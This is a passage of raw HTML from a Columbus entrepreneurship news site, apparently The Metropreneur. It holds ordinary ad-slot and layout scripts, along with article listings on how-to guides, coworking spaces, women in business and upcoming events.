class="td_social_info td_social_info_name">Fans</span><span class="td_social_button"><a href="https://www.facebook.com/TheMetropreneur">Like</a></span></div><div class="td_social_type td-pb-margin-side td_social_instagram"><div class="td-sp td-sp-instagram"></div><span class="td_social_info">1,756</span><span class="td_social_info td_social_info_name">Followers</span><span class="td_social_button"><a href="http://instagram.com/metropreneur#">Follow</a></span></div><div class="td_social_type td-pb-margin-side td_social_twitter"><div class="td-sp td-sp-twitter"></div><span class="td_social_info">8,953</span><span class="td_social_info td_social_info_name">Followers</span><span class="td_social_button"><a href="https://twitter.com/metropreneur">Follow</a></span></div></div> <!-- ./block --> <div class="wpb_raw_code wpb_content_element wpb_raw_html" > <div class="wpb_wrapper"> <!-- Async AdSlot 3 for Ad unit 'Metropreneur_BTF_UpperSquare_Homepage' ### Size: [[300,250]] --> <!-- Adslot's refresh function: googletag.pubads().refresh([gptadslots[2]]) --> <div id='div-gpt-ad-8181961-3'> <script> googletag.cmd.push(function() { googletag.display('div-gpt-ad-8181961-3'); }); </script> </div> <!-- End AdSlot 3 --> </div> </div> <script>var block_td_uid_8_5cdd84e974d31 = new tdBlock(); block_td_uid_8_5cdd84e974d31.id = "td_uid_8_5cdd84e974d31"; block_td_uid_8_5cdd84e974d31.atts = '{"custom_title":"How-To Guides","custom_url":"https:\/\/themetropreneur.com\/columbus\/category\/advising\/how-to-articles\/","category_id":"38","limit":"4","class":"td_uid_8_5cdd84e974d31_rand"}'; block_td_uid_8_5cdd84e974d31.td_column_number = "1"; block_td_uid_8_5cdd84e974d31.block_type = "td_block_7"; block_td_uid_8_5cdd84e974d31.post_count = "4"; block_td_uid_8_5cdd84e974d31.found_posts = "44"; block_td_uid_8_5cdd84e974d31.header_color = ""; block_td_uid_8_5cdd84e974d31.ajax_pagination_infinite_stop = ""; block_td_uid_8_5cdd84e974d31.max_num_pages = "11"; tdBlocksArray.push(block_td_uid_8_5cdd84e974d31); </script><div class="td_block_wrap td_block_7 td_uid_8_5cdd84e974d31_rand td-pb-border-top"><h4 class="block-title"><a href="https://themetropreneur.com/columbus/category/advising/how-to-articles/">How-To Guides</a></h4><div id=td_uid_8_5cdd84e974d31 class="td_block_inner"> <div class="td-block-span12"> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/how-to-shape-your-brand/" rel="bookmark" title="How to Shape Your Brand"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2018/05/branding-100x70.jpg" alt="" title="How to Shape Your Brand"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/how-to-shape-your-brand/" rel="bookmark" title="How to Shape Your Brand">How to Shape Your Brand</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2018-05-18T12:16:04+00:00" >May 18, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2018-05-18T12:16:04+00:00"><meta itemprop="headline " content="How to Shape Your Brand"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2018/05/branding.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span12 --> <div class="td-block-span12"> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/how-to-build-your-pitch-deck/" rel="bookmark" title="How To Build Your Pitch Deck"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2017/05/pitch-100x70.jpg" alt="" title="How To Build Your Pitch Deck"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/how-to-build-your-pitch-deck/" rel="bookmark" title="How To Build Your Pitch Deck">How To Build Your Pitch Deck</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-05-22T09:46:37+00:00" >May 22, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2017-05-22T09:46:37+00:00"><meta itemprop="headline " content="How To Build Your Pitch Deck"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2017/05/pitch.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span12 --> <div class="td-block-span12"> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/search-for-space-coworking-startup-talks-real-estate-hunt/" rel="bookmark" title="Search for Space: Coworking Startup Talks Real Estate Hunt"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2017/01/pexels-photo-296883-100x70.jpeg" alt="" title="Search for Space: Coworking Startup Talks Real Estate Hunt"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/search-for-space-coworking-startup-talks-real-estate-hunt/" rel="bookmark" title="Search for Space: Coworking Startup Talks Real Estate Hunt">Search for Space: Coworking Startup Talks Real Estate Hunt</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-01-23T08:04:17+00:00" >January 23, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2017-01-23T08:04:17+00:00"><meta itemprop="headline " content="Search for Space: Coworking Startup Talks Real Estate Hunt"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2017/01/pexels-photo-296883.jpeg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span12 --> <div class="td-block-span12"> <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/how-to-set-salaries-and-benefits-without-breaking-the-bank/" rel="bookmark" title="How to Set Salaries and Benefits Without Breaking the Bank"><img width="100" height="70" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2016/12/computer-100x70.jpg" alt="" title="How to Set Salaries and Benefits Without Breaking the Bank"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/how-to-set-salaries-and-benefits-without-breaking-the-bank/" rel="bookmark" title="How to Set Salaries and Benefits Without Breaking the Bank">How to Set Salaries and Benefits Without Breaking the Bank</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-12-16T08:00:46+00:00" >December 16, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Randy Gerber"><meta itemprop="datePublished" content="2016-12-16T08:00:46+00:00"><meta itemprop="headline " content="How to Set Salaries and Benefits Without Breaking the Bank"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2016/12/computer.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div> <!-- ./td-block-span12 --></div></div> <!-- ./block --><div class="vc_wp_custommenu wpb_content_element"><div class="widget widget_nav_menu"><h2 class="widgettitle">Local Resource Database</h2><div class="menu-local-resource-database-container"><ul id="menu-local-resource-database" class="menu"><li id="menu-item-1110" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-1110"><a href="https://themetropreneur.com/columbus/local-resource-database/accounting-and-tax-resources/">Accounting and Tax Resources</a></li> <li id="menu-item-324" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-324"><a href="https://themetropreneur.com/columbus/local-resource-database/communications-pr-media-resources/">Communications, PR &#038; Media Resources</a></li> <li id="menu-item-325" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-325"><a href="https://themetropreneur.com/columbus/local-resource-database/community-neighborhood-resources/">Community &#038; Neighborhood Resources</a></li> <li id="menu-item-326" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-326"><a href="https://themetropreneur.com/columbus/local-resource-database/design-branding-multimedia-resources/">Design, Branding &#038; Multimedia Resources</a></li> <li id="menu-item-327" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-327"><a href="https://themetropreneur.com/columbus/local-resource-database/educational-training-resources/">Educational &#038; Training Resources</a></li> <li id="menu-item-328" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-328"><a href="https://themetropreneur.com/columbus/local-resource-database/financial-lending-banking-resources/">Financial, Lending &#038; Banking Resources</a></li> <li id="menu-item-329" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-329"><a href="https://themetropreneur.com/columbus/local-resource-database/governmental-state-local-resources/">Governmental (State &#038; Local) Resources</a></li> <li id="menu-item-330" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-330"><a href="https://themetropreneur.com/columbus/local-resource-database/insurance-resources/">Insurance Resources</a></li> <li id="menu-item-331" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-331"><a href="https://themetropreneur.com/columbus/local-resource-database/legal-resources/">Legal Resources</a></li> <li id="menu-item-332" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-332"><a href="https://themetropreneur.com/columbus/local-resource-database/marketing-resources/">Marketing Resources</a></li> <li id="menu-item-333" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-333"><a href="https://themetropreneur.com/columbus/local-resource-database/membership-resources/">Membership Resources</a></li> <li id="menu-item-334" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-334"><a href="https://themetropreneur.com/columbus/local-resource-database/networking-resources/">Networking Resources</a></li> <li id="menu-item-335" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-335"><a href="https://themetropreneur.com/columbus/local-resource-database/office-space-coworking-resources/">Office Space &#038; Coworking Resources</a></li> <li id="menu-item-336" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-336"><a href="https://themetropreneur.com/columbus/local-resource-database/operational-and-organizational-resources/">Operational and Organizational Resources</a></li> <li id="menu-item-337" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-337"><a href="https://themetropreneur.com/columbus/local-resource-database/retail-real-estate-resources/">Retail &#038; Real Estate Resources</a></li> <li id="menu-item-338" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-338"><a href="https://themetropreneur.com/columbus/local-resource-database/social-media-resources/">Social Media Resources</a></li> <li id="menu-item-339" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-339"><a href="https://themetropreneur.com/columbus/local-resource-database/technology-resources/">Technology Resources</a></li> </ul></div></div></div> <div class="wpb_raw_code wpb_content_element wpb_raw_html" > <div class="wpb_wrapper"> <!-- Async AdSlot 4 for Ad unit 'Metropreneur_BTF_MiddleSquare_Homepage' ### Size: [[300,250]] --> <!-- Adslot's refresh function: googletag.pubads().refresh([gptadslots[3]]) --> <div id='div-gpt-ad-8181961-4'> <script> googletag.cmd.push(function() { googletag.display('div-gpt-ad-8181961-4'); }); </script> </div> <!-- End AdSlot 4 --> </div> </div> </div></div></div><div class="vc_row wpb_row td-pb-row vc_custom_1456930189478"><div class="wpb_column vc_column_container td-pb-span12"><div class="wpb_wrapper"><div class="td-a-rec td-a-rec-id-custom_ad_1 "><!-- Async AdSlot 5 for Ad unit 'Metropreneur_BTF_MiddleLeaderboard_Homepage' ### Size: [[320,50],[728,90]] --> <!-- Adslot's refresh function: googletag.pubads().refresh([gptadslots[4]]) --> <div id='div-gpt-ad-8181961-5'> <script> googletag.cmd.push(function() { googletag.display('div-gpt-ad-8181961-5'); }); </script> </div> <!-- End AdSlot 5 --></div></div></div></div><div class="vc_row wpb_row td-pb-row"><div class="wpb_column vc_column_container td-pb-span4"><div class="wpb_wrapper"><script>var block_td_uid_9_5cdd84e9794a0 = new tdBlock(); block_td_uid_9_5cdd84e9794a0.id = "td_uid_9_5cdd84e9794a0"; block_td_uid_9_5cdd84e9794a0.atts = '{"custom_title":"Coworking","tag_slug":"coworking","limit":"4","class":"td_uid_9_5cdd84e9794a0_rand"}'; block_td_uid_9_5cdd84e9794a0.td_column_number = "1"; block_td_uid_9_5cdd84e9794a0.block_type = "td_block_18"; block_td_uid_9_5cdd84e9794a0.post_count = "4"; block_td_uid_9_5cdd84e9794a0.found_posts = "66"; block_td_uid_9_5cdd84e9794a0.header_color = ""; block_td_uid_9_5cdd84e9794a0.ajax_pagination_infinite_stop = ""; block_td_uid_9_5cdd84e9794a0.max_num_pages = "17"; tdBlocksArray.push(block_td_uid_9_5cdd84e9794a0); </script><div class="td_block_wrap td_block_18 td_uid_9_5cdd84e9794a0_rand td-pb-border-top"><h4 class="block-title"><span>Coworking</span></h4><div id=td_uid_9_5cdd84e9794a0 class="td_block_inner td-column-1"> <div class="td_module_mx8 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="meta-info-container"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/cohatch-the-pub-brings-coworking-to-polaris/" rel="bookmark" title="COhatch The Pub Brings Coworking to Polaris"><img width="696" height="385" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/COhatchPub-FeaureSP-696x385.jpg" alt="" title="COhatch The Pub Brings Coworking to Polaris"/></a></div> <div class="td-module-meta-info"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/cohatch-the-pub-brings-coworking-to-polaris/" rel="bookmark" title="COhatch The Pub Brings Coworking to Polaris">COhatch The Pub Brings Coworking to Polaris</a></h3> <span class="td-author-date"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/susan-post/">Susan Post</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-05-13T16:07:55+00:00" >May 13, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </span> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-05-13T16:07:55+00:00"><meta itemprop="headline " content="COhatch The Pub Brings Coworking to Polaris"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/05/COhatchPub-FeaureSP.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_mx2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/first-coworking-space-coming-to-olde-towne-east/" rel="bookmark" title="First Coworking Space Coming to Olde Towne East"><img width="80" height="60" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/03/The-Merchant-80x60.jpg" alt="" title="First Coworking Space Coming to Olde Towne East"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/first-coworking-space-coming-to-olde-towne-east/" rel="bookmark" title="First Coworking Space Coming to Olde Towne East">First Coworking Space Coming to Olde Towne East</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-03-22T15:25:37+00:00" >March 22, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-03-22T15:25:37+00:00"><meta itemprop="headline " content="First Coworking Space Coming to Olde Towne East"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/03/The-Merchant.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_mx2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/new-roundup-cohatchs-the-hub-times-best-inventions-of-2018-more/" rel="bookmark" title="News Roundup: COhatch&#8217;s The Hub, TIME&#8217;s Best Inventions of 2018 &amp; More"><img width="80" height="60" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2018/12/NewsRoundup-126-80x60.jpg" alt="" title="News Roundup: COhatch&#8217;s The Hub, TIME&#8217;s Best Inventions of 2018 &amp; More"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/new-roundup-cohatchs-the-hub-times-best-inventions-of-2018-more/" rel="bookmark" title="News Roundup: COhatch&#8217;s The Hub, TIME&#8217;s Best Inventions of 2018 &amp; More">News Roundup: COhatch&#8217;s The Hub, TIME&#8217;s Best Inventions of 2018 &amp; More</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2018-12-06T11:33:42+00:00" >December 6, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2018-12-06T11:33:42+00:00"><meta itemprop="headline " content="News Roundup: COhatch&#039;s The Hub, TIME&#039;s Best Inventions of 2018 &amp; More"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2018/12/NewsRoundup-126.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_mx2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/the-eleanor-brings-woman-focused-community-workspace-to-short-north/" rel="bookmark" title="The Eleanor Brings Woman-Focused Community Workspace to Short North"><img width="80" height="60" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2018/12/TheEleanor-Feature-80x60.jpg" alt="" title="The Eleanor Brings Woman-Focused Community Workspace to Short North"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/the-eleanor-brings-woman-focused-community-workspace-to-short-north/" rel="bookmark" title="The Eleanor Brings Woman-Focused Community Workspace to Short North">The Eleanor Brings Woman-Focused Community Workspace to Short North</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2018-12-03T15:52:02+00:00" >December 3, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2018-12-03T15:52:02+00:00"><meta itemprop="headline " content="The Eleanor Brings Woman-Focused Community Workspace to Short North"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2018/12/TheEleanor-Feature.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div></div> <!-- ./block --></div></div><div class="wpb_column vc_column_container td-pb-span4"><div class="wpb_wrapper"><script>var block_td_uid_10_5cdd84e97b569 = new tdBlock(); block_td_uid_10_5cdd84e97b569.id = "td_uid_10_5cdd84e97b569"; block_td_uid_10_5cdd84e97b569.atts = '{"custom_title":"Women in Business","tag_slug":"women-in-business","limit":"4","class":"td_uid_10_5cdd84e97b569_rand"}'; block_td_uid_10_5cdd84e97b569.td_column_number = "1"; block_td_uid_10_5cdd84e97b569.block_type = "td_block_18"; block_td_uid_10_5cdd84e97b569.post_count = "4"; block_td_uid_10_5cdd84e97b569.found_posts = "145"; block_td_uid_10_5cdd84e97b569.header_color = ""; block_td_uid_10_5cdd84e97b569.ajax_pagination_infinite_stop = ""; block_td_uid_10_5cdd84e97b569.max_num_pages = "37"; tdBlocksArray.push(block_td_uid_10_5cdd84e97b569); </script><div class="td_block_wrap td_block_18 td_uid_10_5cdd84e97b569_rand td-pb-border-top"><h4 class="block-title"><span>Women in Business</span></h4><div id=td_uid_10_5cdd84e97b569 class="td_block_inner td-column-1"> <div class="td_module_mx8 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="meta-info-container"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/new-app-shuffle-curates-user-generated-lists-of-favorite-places/" rel="bookmark" title="New App Shuffle Curates User-Generated Lists of Favorite Places"><img width="696" height="385" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2018/12/Shuffle-Mfeature-696x385.png" alt="" title="New App Shuffle Curates User-Generated Lists of Favorite Places"/></a></div> <div class="td-module-meta-info"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/new-app-shuffle-curates-user-generated-lists-of-favorite-places/" rel="bookmark" title="New App Shuffle Curates User-Generated Lists of Favorite Places">New App Shuffle Curates User-Generated Lists of Favorite Places</a></h3> <span class="td-author-date"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/susan-post/">Susan Post</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2018-12-19T16:54:27+00:00" >December 19, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </span> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2018-12-19T16:54:27+00:00"><meta itemprop="headline " content="New App Shuffle Curates User-Generated Lists of Favorite Places"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2018/12/Shuffle-Mfeature.png"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_mx2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/the-eleanor-brings-woman-focused-community-workspace-to-short-north/" rel="bookmark" title="The Eleanor Brings Woman-Focused Community Workspace to Short North"><img width="80" height="60" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2018/12/TheEleanor-Feature-80x60.jpg" alt="" title="The Eleanor Brings Woman-Focused Community Workspace to Short North"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/the-eleanor-brings-woman-focused-community-workspace-to-short-north/" rel="bookmark" title="The Eleanor Brings Woman-Focused Community Workspace to Short North">The Eleanor Brings Woman-Focused Community Workspace to Short North</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2018-12-03T15:52:02+00:00" >December 3, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2018-12-03T15:52:02+00:00"><meta itemprop="headline " content="The Eleanor Brings Woman-Focused Community Workspace to Short North"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2018/12/TheEleanor-Feature.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_mx2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/family-mentor-foundation-launches-social-enterprise-mee-box/" rel="bookmark" title="Family Mentor Foundation Launches Social Enterprise Mee Box"><img width="80" height="60" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2018/09/FamilyMentor-Feature-80x60.jpg" alt="" title="Family Mentor Foundation Launches Social Enterprise Mee Box"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/family-mentor-foundation-launches-social-enterprise-mee-box/" rel="bookmark" title="Family Mentor Foundation Launches Social Enterprise Mee Box">Family Mentor Foundation Launches Social Enterprise Mee Box</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2018-09-07T08:00:58+00:00" >September 7, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Sara Parker"><meta itemprop="datePublished" content="2018-09-07T08:00:58+00:00"><meta itemprop="headline " content="Family Mentor Foundation Launches Social Enterprise Mee Box"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2018/09/FamilyMentor-Feature.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_mx2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/eleventh-candle-co-partners-with-cohatch-to-accelerate-impact/" rel="bookmark" title="Eleventh Candle Co. Partners with COhatch to Accelerate Impact"><img width="80" height="60" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2018/09/Eleventh-80x60.jpg" alt="" title="Eleventh Candle Co. Partners with COhatch to Accelerate Impact"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/eleventh-candle-co-partners-with-cohatch-to-accelerate-impact/" rel="bookmark" title="Eleventh Candle Co. Partners with COhatch to Accelerate Impact">Eleventh Candle Co. Partners with COhatch to Accelerate Impact</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2018-09-06T11:08:48+00:00" >September 6, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2018-09-06T11:08:48+00:00"><meta itemprop="headline " content="Eleventh Candle Co. Partners with COhatch to Accelerate Impact"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2018/09/Eleventh.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> </div></div> <!-- ./block --></div></div><div class="wpb_column vc_column_container td-pb-span4"><div class="wpb_wrapper"><script>var block_td_uid_11_5cdd84e97d6ad = new tdBlock(); block_td_uid_11_5cdd84e97d6ad.id = "td_uid_11_5cdd84e97d6ad"; block_td_uid_11_5cdd84e97d6ad.atts = '{"custom_title":"Upcoming Events","category_id":"25","limit":"4","class":"td_uid_11_5cdd84e97d6ad_rand"}'; block_td_uid_11_5cdd84e97d6ad.td_column_number = "1"; block_td_uid_11_5cdd84e97d6ad.block_type = "td_block_18"; block_td_uid_11_5cdd84e97d6ad.post_count = "4"; block_td_uid_11_5cdd84e97d6ad.found_posts = "126"; block_td_uid_11_5cdd84e97d6ad.header_color = ""; block_td_uid_11_5cdd84e97d6ad.ajax_pagination_infinite_stop = ""; block_td_uid_11_5cdd84e97d6ad.max_num_pages = "32"; tdBlocksArray.push(block_td_uid_11_5cdd84e97d6ad); </script><div class="td_block_wrap td_block_18 td_uid_11_5cdd84e97d6ad_rand td-pb-border-top"><h4 class="block-title"><span>Upcoming Events</span></h4><div id=td_uid_11_5cdd84e97d6ad class="td_block_inner td-column-1"> <div class="td_module_mx8 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="meta-info-container"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/questionable-facebook-tactics-at-work-to-promote-upcoming-summit/" rel="bookmark" title="Questionable Facebook Tactics at Work to Promote Upcoming Summit"><img width="696" height="385" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/03/SkySprout-696x385.jpg" alt="" title="Questionable Facebook Tactics at Work to Promote Upcoming Summit"/></a></div> <div class="td-module-meta-info"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/questionable-facebook-tactics-at-work-to-promote-upcoming-summit/" rel="bookmark" title="Questionable Facebook Tactics at Work to Promote Upcoming Summit">Questionable Facebook Tactics at Work to Promote Upcoming Summit</a></h3> <span class="td-author-date"> <div class="td-post-author-name"><a itemprop="author" href="https://themetropreneur.com/columbus/author/susan-post/">Susan Post</a> <span>-</span> </div> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-03-20T11:25:53+00:00" >March 20, 2019</time><meta itemprop="interactionCount" content="UserComments:0"/></div> </span> </div> </div> <meta itemprop="author" content = "Susan Post"><meta itemprop="datePublished" content="2019-03-20T11:25:53+00:00"><meta itemprop="headline " content="Questionable Facebook Tactics at Work to Promote Upcoming Summit"><meta itemprop="image" content="https://themetropreneur.com/columbus/wp-content/uploads/2019/03/SkySprout.jpg"><meta itemprop="interactionCount" content="UserComments:0"/> </div> <div class="td_module_mx2 td_module_wrap td-animation-stack" itemscope itemtype="https://schema.org/Article"> <div class="td-module-thumb"><a href="https://themetropreneur.com/columbus/innovation-meets-impact-at-philanthropitch-columbus/" rel="bookmark" title="Innovation Meets Impact at Philanthropitch Columbus"><img width="80" height="60" itemprop="image" class="entry-thumb" src="https://themetropreneur.com/columbus/wp-content/uploads/2019/02/Philanthropitch-provided1-80x60.jpg" alt="" title="Innovation Meets Impact at Philanthropitch Columbus"/></a></div> <div class="item-details"> <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="https://themetropreneur.com/columbus/innovation-meets-impact-at-philanthropitch-columbus/" rel="bookmark" title="Innovation Meets Impact at Philanthropitch Columbus">Innovation Meets Impact at Philanthropitch Columbus</a></h3> <div class="td-module-meta-info"> <div class="td-post-date"><time itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2019-02-06T08:00:39+00:00" >February 6, 2019</time><meta itemprop="interactionCount" 